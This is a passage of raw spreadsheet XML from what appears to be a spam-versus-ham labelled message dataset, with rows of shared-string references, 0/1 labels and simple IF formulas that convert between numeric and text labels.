        <v>5265</v>
      </c>
      <c r="B6004">
        <v>0</v>
      </c>
      <c r="C6004" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6005" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6005" t="s">
        <v>5266</v>
      </c>
      <c r="B6005">
        <v>0</v>
      </c>
      <c r="C6005" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6006" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6006" t="s">
        <v>5267</v>
      </c>
      <c r="B6006">
        <v>0</v>
      </c>
      <c r="C6006" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6007" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6007" t="s">
        <v>21</v>
      </c>
      <c r="B6007">
        <v>0</v>
      </c>
      <c r="C6007" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6008" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6008" t="s">
        <v>5268</v>
      </c>
      <c r="B6008">
        <v>0</v>
      </c>
      <c r="C6008" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6009" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6009" t="s">
        <v>5269</v>
      </c>
      <c r="B6009">
        <v>0</v>
      </c>
      <c r="C6009" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6010" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6010" t="s">
        <v>5270</v>
      </c>
      <c r="B6010">
        <v>0</v>
      </c>
      <c r="C6010" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6011" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6011" t="s">
        <v>5271</v>
      </c>
      <c r="B6011">
        <v>0</v>
      </c>
      <c r="C6011" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6012" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6012" t="s">
        <v>5272</v>
      </c>
      <c r="B6012">
        <v>0</v>
      </c>
      <c r="C6012" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6013" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6013" t="s">
        <v>5273</v>
      </c>
      <c r="B6013">
        <v>0</v>
      </c>
      <c r="C6013" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6014" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6014" t="s">
        <v>5274</v>
      </c>
      <c r="B6014">
        <v>0</v>
      </c>
      <c r="C6014" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6015" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6015" t="s">
        <v>5275</v>
      </c>
      <c r="B6015">
        <v>0</v>
      </c>
      <c r="C6015" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6016" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6016" t="s">
        <v>5276</v>
      </c>
      <c r="B6016">
        <v>0</v>
      </c>
      <c r="C6016" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6017" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6017" t="s">
        <v>5277</v>
      </c>
      <c r="B6017">
        <v>0</v>
      </c>
      <c r="C6017" t="str">
        <f t="shared" si="93"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6018" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6018" t="s">
        <v>21</v>
      </c>
      <c r="B6018">
        <v>0</v>
      </c>
      <c r="C6018" t="str">
        <f t="shared" ref="C6018:C6047" si="94">IF(B6018="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="6019" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6019" t="s">
        <v>21</v>
      </c>
      <c r="B6019">
        <v>0</v>
      </c>
      <c r="C6019" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6020" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6020" t="s">
        <v>21</v>
      </c>
      <c r="B6020">
        <v>0</v>
      </c>
      <c r="C6020" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6021" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6021" t="s">
        <v>5278</v>
      </c>
      <c r="B6021">
        <v>0</v>
      </c>
      <c r="C6021" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6022" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6022" t="s">
        <v>5279</v>
      </c>
      <c r="B6022">
        <v>0</v>
      </c>
      <c r="C6022" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6023" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6023" t="s">
        <v>21</v>
      </c>
      <c r="B6023">
        <v>0</v>
      </c>
      <c r="C6023" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6024" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6024" t="s">
        <v>5280</v>
      </c>
      <c r="B6024">
        <v>0</v>
      </c>
      <c r="C6024" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6025" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6025" t="s">
        <v>5281</v>
      </c>
      <c r="B6025">
        <v>0</v>
      </c>
      <c r="C6025" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6026" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6026" t="s">
        <v>5282</v>
      </c>
      <c r="B6026">
        <v>0</v>
      </c>
      <c r="C6026" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6027" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6027" t="s">
        <v>5283</v>
      </c>
      <c r="B6027">
        <v>0</v>
      </c>
      <c r="C6027" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6028" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6028" t="s">
        <v>5284</v>
      </c>
      <c r="B6028">
        <v>0</v>
      </c>
      <c r="C6028" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6029" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6029" t="s">
        <v>5285</v>
      </c>
      <c r="B6029">
        <v>0</v>
      </c>
      <c r="C6029" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6030" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6030" t="s">
        <v>21</v>
      </c>
      <c r="B6030">
        <v>0</v>
      </c>
      <c r="C6030" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6031" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6031" t="s">
        <v>21</v>
      </c>
      <c r="B6031">
        <v>0</v>
      </c>
      <c r="C6031" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6032" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6032" t="s">
        <v>5286</v>
      </c>
      <c r="B6032">
        <v>0</v>
      </c>
      <c r="C6032" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6033" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6033" t="s">
        <v>5287</v>
      </c>
      <c r="B6033">
        <v>0</v>
      </c>
      <c r="C6033" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6034" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6034" t="s">
        <v>5288</v>
      </c>
      <c r="B6034">
        <v>0</v>
      </c>
      <c r="C6034" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6035" t="s">
        <v>5289</v>
      </c>
      <c r="B6035">
        <v>0</v>
      </c>
      <c r="C6035" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6036" t="s">
        <v>5290</v>
      </c>
      <c r="B6036">
        <v>0</v>
      </c>
      <c r="C6036" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6037" t="s">
        <v>21</v>
      </c>
      <c r="B6037">
        <v>0</v>
      </c>
      <c r="C6037" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6038" t="s">
        <v>21</v>
      </c>
      <c r="B6038">
        <v>0</v>
      </c>
      <c r="C6038" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6039" t="s">
        <v>21</v>
      </c>
      <c r="B6039">
        <v>0</v>
      </c>
      <c r="C6039" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6040" t="s">
        <v>21</v>
      </c>
      <c r="B6040">
        <v>0</v>
      </c>
      <c r="C6040" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6041" t="s">
        <v>5291</v>
      </c>
      <c r="B6041">
        <v>0</v>
      </c>
      <c r="C6041" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6042" t="s">
        <v>21</v>
      </c>
      <c r="B6042">
        <v>0</v>
      </c>
      <c r="C6042" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6043" t="s">
        <v>21</v>
      </c>
      <c r="B6043">
        <v>0</v>
      </c>
      <c r="C6043" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6044" t="s">
        <v>5292</v>
      </c>
      <c r="B6044">
        <v>0</v>
      </c>
      <c r="C6044" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6045" t="s">
        <v>5293</v>
      </c>
      <c r="B6045">
        <v>0</v>
      </c>
      <c r="C6045" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6046" t="s">
        <v>21</v>
      </c>
      <c r="B6046">
        <v>0</v>
      </c>
      <c r="C6046" t="str">
        <f t="shared" si="94"/>
        <v>ham</v>
      </c>
    </row>
    <row r="6047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6047" t="s">
        <v>21</v>
      </c>
      <c r="B6047">
        <v>0</v>
      </c>
      <c r="C6047" t="str">
        <f t="shared" si="94"/>
        <v>ham</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FB4C-1A1B-497F-999C-3D524C7BE8C0}">
  <dimension ref="A1:C5574"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection sqref="A1:A1048576"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="174.88671875" customWidth="1"/>
    <col min="2" max="2" width="12.109375" customWidth="1"/>
    <col min="3" max="3" width="19.44140625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1" t="s">
        <v>10465</v>
      </c>
      <c r="B1" s="3" t="s">
        <v>10464</v>
      </c>
      <c r="C1" s="4" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="2" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>5295</v>
      </c>
      <c r="B2" t="s">
        <v>5294</v>
      </c>
      <c r="C2" s="1">
        <f>IF(B2="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A3" t="s">
        <v>5296</v>
      </c>
      <c r="B3" t="s">
        <v>5294</v>
      </c>
      <c r="C3" s="1">
        <f>IF(B3="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4" t="s">
        <v>5298</v>
      </c>
      <c r="B4" t="s">
        <v>5297</v>
      </c>
      <c r="C4" s="1">
        <f>IF(B4="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A5" t="s">
        <v>5299</v>
      </c>
      <c r="B5" t="s">
        <v>5294</v>
      </c>
      <c r="C5" s="1">
        <f>IF(B5="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A6" t="s">
        <v>5300</v>
      </c>
      <c r="B6" t="s">
        <v>5294</v>
      </c>
      <c r="C6" s="1">
        <f>IF(B6="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A7" t="s">
        <v>5301</v>
      </c>
      <c r="B7" t="s">
        <v>5297</v>
      </c>
      <c r="C7" s="1">
        <f>IF(B7="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A8" t="s">
        <v>5302</v>
      </c>
      <c r="B8" t="s">
        <v>5294</v>
      </c>
      <c r="C8" s="1">
        <f>IF(B8="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A9" t="s">
        <v>5303</v>
      </c>
      <c r="B9" t="s">
        <v>5294</v>
      </c>
      <c r="C9" s="1">
        <f>IF(B9="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A10" t="s">
        <v>5304</v>
      </c>
      <c r="B10" t="s">
        <v>5297</v>
      </c>
      <c r="C10" s="1">
        <f>IF(B10="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A11" t="s">
        <v>5305</v>
      </c>
      <c r="B11" t="s">
        <v>5297</v>
      </c>
      <c r="C11" s="1">
        <f>IF(B11="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A12" t="s">
        <v>5306</v>
      </c>
      <c r="B12" t="s">
        <v>5294</v>
      </c>
      <c r="C12" s="1">
        <f>IF(B12="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A13" t="s">
        <v>5307</v>
      </c>
      <c r="B13" t="s">
        <v>5297</v>
      </c>
      <c r="C13" s="1">
        <f>IF(B13="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A14" t="s">
        <v>5308</v>
      </c>
      <c r="B14" t="s">
        <v>5297</v>
      </c>
      <c r="C14" s="1">
        <f>IF(B14="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15" t="s">
        <v>5309</v>
      </c>
      <c r="B15" t="s">
        <v>5294</v>
      </c>
      <c r="C15" s="1">
        <f>IF(B15="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A16" t="s">
        <v>5310</v>
      </c>
      <c r="B16" t="s">
        <v>5294</v>
      </c>
      <c r="C16" s="1">
        <f>IF(B16="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A17" t="s">
        <v>5311</v>
      </c>
      <c r="B17" t="s">
        <v>5297</v>
      </c>
      <c r="C17" s="1">
        <f>IF(B17="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A18" t="s">
        <v>5312</v>
      </c>
      <c r="B18" t="s">
        <v>5294</v>
      </c>
      <c r="C18" s="1">
        <f>IF(B18="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A19" t="s">
        <v>5313</v>
      </c>
      <c r="B19" t="s">
        <v>5294</v>
      </c>
      <c r="C19" s="1">
        <f>IF(B19="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A20" t="s">
        <v>5314</v>
      </c>
      <c r="B20" t="s">
        <v>5294</v>
      </c>
      <c r="C20" s="1">
        <f>IF(B20="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A21" t="s">
        <v>5315</v>
      </c>
      <c r="B21" t="s">
        <v>5297</v>
      </c>
      <c r="C21" s="1">
        <f>IF(B21="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A22" t="s">
        <v>5316</v>
      </c>
      <c r="B22" t="s">
        <v>5294</v>
      </c>
      <c r="C22" s="1">
        <f>IF(B22="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A23" t="s">
        <v>5317</v>
      </c>
      <c r="B23" t="s">
        <v>5294</v>
      </c>
      <c r="C23" s="1">
        <f>IF(B23="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A24" t="s">
        <v>5318</v>
      </c>
      <c r="B24" t="s">
        <v>5294</v>
      </c>
      <c r="C24" s="1">
        <f>IF(B24="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A25" t="s">
        <v>5319</v>
      </c>
      <c r="B25" t="s">
        <v>5294</v>
      </c>
      <c r="C25" s="1">
        <f>IF(B25="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A26" t="s">
        <v>5320</v>
      </c>
      <c r="B26" t="s">
        <v>5294</v>
      </c>
      <c r="C26" s="1">
        <f>IF(B26="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A27" t="s">
        <v>5321</v>
      </c>
      <c r="B27" t="s">
        <v>5294</v>
      </c>
      <c r="C27" s="1">
        <f>IF(B27="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A28" t="s">
        <v>5322</v>
      </c>
      <c r="B28" t="s">
        <v>5294</v>
      </c>
      <c r="C28" s="1">
        <f>IF(B28="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A29" t="s">
        <v>5323</v>
      </c>
      <c r="B29" t="s">
        <v>5294</v>
      </c>
      <c r="C29" s="1">
        <f>IF(B29="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="30" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A30" t="s">
        <v>5324</v>
      </c>
      <c r="B30" t="s">
        <v>5294</v>
      </c>
      <c r="C30" s="1">
        <f>IF(B30="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A31" t="s">
        <v>5325</v>
      </c>
      <c r="B31" t="s">
        <v>5294</v>
      </c>
      <c r="C31" s="1">
        <f>IF(B31="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="32" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A32" t="s">
        <v>5326</v>
      </c>
      <c r="B32" t="s">
        <v>5294</v>
      </c>
      <c r="C32" s="1">
        <f>IF(B32="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A33" t="s">
        <v>5327</v>
      </c>
      <c r="B33" t="s">
        <v>5294</v>
      </c>
      <c r="C33" s="1">
        <f>IF(B33="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34" t="s">
        <v>5328</v>
      </c>
      <c r="B34" t="s">
        <v>5294</v>
      </c>
      <c r="C34" s="1">
        <f>IF(B34="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A35" t="s">
        <v>5329</v>
      </c>
      <c r="B35" t="s">
        <v>5294</v>
      </c>
      <c r="C35" s="1">
        <f>IF(B35="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A36" t="s">
        <v>5330</v>
      </c>
      <c r="B36" t="s">
        <v>5297</v>
      </c>
      <c r="C36" s="1">
        <f>IF(B36="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A37" t="s">
        <v>5331</v>
      </c>
      <c r="B37" t="s">
        <v>5294</v>
      </c>
      <c r="C37" s="1">
        <f>IF(B37="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A38" t="s">
        <v>5332</v>
      </c>
      <c r="B38" t="s">
        <v>5294</v>
      </c>
      <c r="C38" s="1">
        <f>IF(B38="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A39" t="s">
        <v>5333</v>
      </c>
      <c r="B39" t="s">
        <v>5294</v>
      </c>
      <c r="C39" s="1">
        <f>IF(B39="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="40" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A40" t="s">
        <v>5334</v>
      </c>
      <c r="B40" t="s">
        <v>5294</v>
      </c>
      <c r="C40" s="1">
        <f>IF(B40="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A41" t="s">
        <v>5335</v>
      </c>
      <c r="B41" t="s">
        <v>5294</v>
      </c>
      <c r="C41" s="1">
        <f>IF(B41="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A42" t="s">
        <v>5336</v>
      </c>
      <c r="B42" t="s">
        <v>5294</v>
      </c>
      <c r="C42" s="1">
        <f>IF(B42="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="43" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A43" t="s">
        <v>5337</v>
      </c>
      <c r="B43" t="s">
        <v>5294</v>
      </c>
      <c r="C43" s="1">
        <f>IF(B43="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="44" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A44" t="s">
        <v>5338</v>
      </c>
      <c r="B44" t="s">
        <v>5297</v>
      </c>
      <c r="C44" s="1">
        <f>IF(B44="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A45" t="s">
        <v>5339</v>
      </c>
      <c r="B45" t="s">
        <v>5294</v>
      </c>
      <c r="C45" s="1">
        <f>IF(B45="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A46" t="s">
        <v>5340</v>
      </c>
      <c r="B46" t="s">
        <v>5294</v>
      </c>
      <c r="C46" s="1">
        <f>IF(B46="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A47" t="s">
        <v>5341</v>
      </c>
      <c r="B47" t="s">
        <v>5294</v>
      </c>
      <c r="C47" s="1">
        <f>IF(B47="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A48" t="s">
        <v>5342</v>
      </c>
      <c r="B48" t="s">
        <v>5294</v>
      </c>
      <c r="C48" s="1">
        <f>IF(B48="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A49" t="s">
        <v>5343</v>
      </c>
      <c r="B49" t="s">
        <v>5294</v>
      </c>
      <c r="C49" s="1">
        <f>IF(B49="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="50" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A50" t="s">
        <v>5344</v>
      </c>
      <c r="B50" t="s">
        <v>5294</v>
      </c>
      <c r="C50" s="1">
        <f>IF(B50="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A51" t="s">
        <v>5345</v>
      </c>
      <c r="B51" t="s">
        <v>5294</v>
      </c>
      <c r="C51" s="1">
        <f>IF(B51="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="52" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A52" t="s">
        <v>5346</v>
      </c>
      <c r="B52" t="s">
        <v>5294</v>
      </c>
      <c r="C52" s="1">
        <f>IF(B52="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="53" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A53" t="s">
        <v>5347</v>
      </c>
      <c r="B53" t="s">
        <v>5294</v>
      </c>
      <c r="C53" s="1">
        <f>IF(B53="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A54" t="s">
        <v>5348</v>
      </c>
      <c r="B54" t="s">
        <v>5294</v>
      </c>
      <c r="C54" s="1">
        <f>IF(B54="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="55" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A55" t="s">
        <v>5349</v>
      </c>
      <c r="B55" t="s">
        <v>5294</v>
      </c>
      <c r="C55" s="1">
        <f>IF(B55="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A56" t="s">
        <v>5350</v>
      </c>
      <c r="B56" t="s">
        <v>5297</v>
      </c>
      <c r="C56" s="1">
        <f>IF(B56="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A57" t="s">
        <v>5351</v>
      </c>
      <c r="B57" t="s">
        <v>5294</v>
      </c>
      <c r="C57" s="1">
        <f>IF(B57="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="58" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A58" t="s">
        <v>5352</v>
      </c>
      <c r="B58" t="s">
        <v>5297</v>
      </c>
      <c r="C58" s="1">
        <f>IF(B58="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="59" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A59" t="s">
        <v>5353</v>
      </c>
      <c r="B59" t="s">
        <v>5294</v>
      </c>
      <c r="C59" s="1">
        <f>IF(B59="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A60" t="s">
        <v>5354</v>
      </c>
      <c r="B60" t="s">
        <v>5294</v>
      </c>
      <c r="C60" s="1">
        <f>IF(B60="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="61" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A61" t="s">
        <v>5355</v>
      </c>
      <c r="B61" t="s">
        <v>5294</v>
      </c>
      <c r="C61" s="1">
        <f>IF(B61="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="62" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A62" t="s">
        <v>5356</v>
      </c>
      <c r="B62" t="s">
        <v>5294</v>
      </c>
      <c r="C62" s="1">
        <f>IF(B62="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="63" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A63" t="s">
        <v>5357</v>
      </c>
      <c r="B63" t="s">
        <v>5294</v>
      </c>
      <c r="C63" s="1">
        <f>IF(B63="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A64" t="s">
        <v>5358</v>
      </c>
      <c r="B64" t="s">
        <v>5294</v>
      </c>
      <c r="C64" s="1">
        <f>IF(B64="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="65" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A65" t="s">
